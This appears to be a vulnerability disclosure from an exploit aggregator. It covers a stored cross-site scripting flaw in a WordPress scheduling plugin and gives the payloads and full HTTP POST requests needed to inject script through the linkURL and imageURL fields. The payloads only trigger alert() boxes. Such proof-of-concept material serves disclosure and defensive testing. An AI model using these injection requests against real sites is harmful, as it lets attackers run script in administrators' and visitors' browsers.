## https://sploitus.com/exploit?id=WPEX-ID:C557FF04-31D5-4774-B101-1865A102BF16
Vulnerable parameters: linkURL (some validation is done) and imageURL.
(easiest way to reproduce via the linkURL, put the following payload in the Link URL of a Schedule: https://aa.com/#"><script>alert(`XSS`)</script>)
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 301
Connection: close
Cookie: [admin+]
action=show-time-curd&sday=Sunday&startTime=10%3A00&eday=Sunday&endTime=12%3A00&showname=Show&linkUrl=https%3A%2F%2Faa.com%2F%23%22%3E%3Cscript%3Ealert(%60XSS-linkURL%60)%3C%2Fscript%3E&imageUrl=%22%3e%3cimg%20src%20onerror%3dalert(%60XSS-imageURL%60)%3e&crud-action=create&joan_nonce_field=c0b1b9f0d4
The XSS will be triggered in the plugin's settings, frontend when the Show is displayed (via any of the shortcodes for example), as well as show-time-curd AJAX action (available to both unauthenticated and authenticate users)
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 38
Connection: close
action=show-time-curd&crud-action=read
Furthermore, when updating a schedule, the linkURL is also not validated at all (and XSS will trigger like mentioned above):
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 250
Connection: close
Cookie: [admin+]
action=show-time-curd&showName%5B11%5D=Show&linkURL%5B11%5D=%22%3e%3cimg%20src%20onerror%3dalert(%60XSS-linkURL%60)%3e&imageURL%5B11%5D=%22%3e%3cimg%20src%20onerror%3dalert(%60XSS-imageURL%60)%3e&crud-action=update&joan_entries_nonce_field=c3506180d5